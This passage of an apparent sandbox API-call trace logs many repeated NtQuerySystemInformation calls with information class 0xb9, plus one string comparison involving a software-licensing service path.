ResultLength=0x0) [0243.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x20, ResultLength=0x0) [0243.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f170, Length=0x38, ResultLength=0x0) [0243.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f000, Length=0x20, ResultLength=0x0) [0243.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef90, Length=0x20, ResultLength=0x0) [0243.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef90, Length=0x20, ResultLength=0x0) [0243.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f510, Length=0x20, ResultLength=0x0) [0260.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0260.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f930, Length=0x48, ResultLength=0x0) [0260.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0260.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0260.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) Thread: id = 639 os_tid = 0xe00 [0243.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0f0, Length=0x50, ResultLength=0x0) [0243.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0f0, Length=0x50, ResultLength=0x0) [0243.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0f0, Length=0x50, ResultLength=0x0) [0243.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x50, ResultLength=0x0) [0243.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x50, ResultLength=0x0) [0243.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x50, ResultLength=0x0) [0243.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x50, ResultLength=0x0) [0243.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf10, Length=0x38, ResultLength=0x0) [0243.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdd40, Length=0x28, ResultLength=0x0) [0243.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdd40, Length=0x28, ResultLength=0x0) [0243.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdd40, Length=0x28, ResultLength=0x0) [0243.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdd40, Length=0x28, ResultLength=0x0) [0243.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efddb0, Length=0x28, ResultLength=0x0) [0243.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf10, Length=0x38, ResultLength=0x0) [0243.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde30, Length=0x28, ResultLength=0x0) [0243.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde30, Length=0x28, ResultLength=0x0) [0243.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdcd0, Length=0x20, ResultLength=0x0) [0243.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdc50, Length=0x20, ResultLength=0x0) [0243.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdc50, Length=0x20, ResultLength=0x0) [0243.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdc50, Length=0x20, ResultLength=0x0) [0243.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf10, Length=0x38, ResultLength=0x0) [0243.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf10, Length=0x38, ResultLength=0x0) [0243.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdd90, Length=0x20, ResultLength=0x0) [0243.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdd20, Length=0x20, ResultLength=0x0) [0243.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdd20, Length=0x20, ResultLength=0x0) [0243.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe340, Length=0x50, ResultLength=0x0) [0243.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe340, Length=0x50, ResultLength=0x0) [0243.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe340, Length=0x50, ResultLength=0x0) [0243.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe230, Length=0x50, ResultLength=0x0) [0243.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe230, Length=0x50, ResultLength=0x0) [0243.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe230, Length=0x50, ResultLength=0x0) [0243.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe230, Length=0x50, ResultLength=0x0) [0243.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe160, Length=0x38, ResultLength=0x0) [0243.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x28, ResultLength=0x0) [0243.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x28, ResultLength=0x0) [0243.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x28, ResultLength=0x0) [0243.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe000, Length=0x28, ResultLength=0x0) [0243.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe160, Length=0x38, ResultLength=0x0) [0243.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x28, ResultLength=0x0) [0243.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x28, ResultLength=0x0) [0243.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe160, Length=0x38, ResultLength=0x0) [0243.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x20, ResultLength=0x0) [0243.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf60, Length=0x20, ResultLength=0x0) [0243.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf60, Length=0x20, ResultLength=0x0) [0243.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf60, Length=0x20, ResultLength=0x0) [0243.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe160, Length=0x38, ResultLength=0x0) [0243.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x20, ResultLength=0x0) [0243.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf70, Length=0x20, ResultLength=0x0) [0243.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf70, Length=0x20, ResultLength=0x0) [0243.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe340, Length=0x50, ResultLength=0x0) [0243.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe340, Length=0x50, ResultLength=0x0) [0243.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe340, Length=0x50, ResultLength=0x0) [0243.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe230, Length=0x50, ResultLength=0x0) [0243.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe230, Length=0x50, ResultLength=0x0) [0243.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe230, Length=0x50, ResultLength=0x0) [0243.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe230, Length=0x50, ResultLength=0x0) [0243.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe160, Length=0x38, ResultLength=0x0) [0243.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x28, ResultLength=0x0) [0243.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x28, ResultLength=0x0) [0243.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x28, ResultLength=0x0) [0243.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe000, Length=0x28, ResultLength=0x0) [0243.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe160, Length=0x38, ResultLength=0x0) [0243.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x28, ResultLength=0x0) [0243.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x28, ResultLength=0x0) [0243.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe160, Length=0x38, ResultLength=0x0) [0243.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x20, ResultLength=0x0) [0243.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf60, Length=0x20, ResultLength=0x0) [0243.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf60, Length=0x20, ResultLength=0x0) [0243.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf60, Length=0x20, ResultLength=0x0) [0243.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe160, Length=0x38, ResultLength=0x0) [0243.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x20, ResultLength=0x0) [0243.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf70, Length=0x20, ResultLength=0x0) [0243.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf70, Length=0x20, ResultLength=0x0) [0243.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3f0, Length=0x50, ResultLength=0x0) [0243.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe370, Length=0x28, ResultLength=0x0) [0243.811] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0243.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3f0, Length=0x50, ResultLength=0x0) [0243.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3f0, Length=0x50, ResultLength=0x0) [0243.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3f0, Length=0x50, ResultLength=0x0) [0243.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe320, Length=0x38, ResultLength=0x0) [0243.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe150, Length=0x28, ResultLength=0x0) [0243.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe150, Length=0x28, ResultLength=0x0) [0243.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe150, Length=0x28, ResultLength=0x0) [0243.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1c0, Length=0x28, ResultLength=0x0) [0243.816] 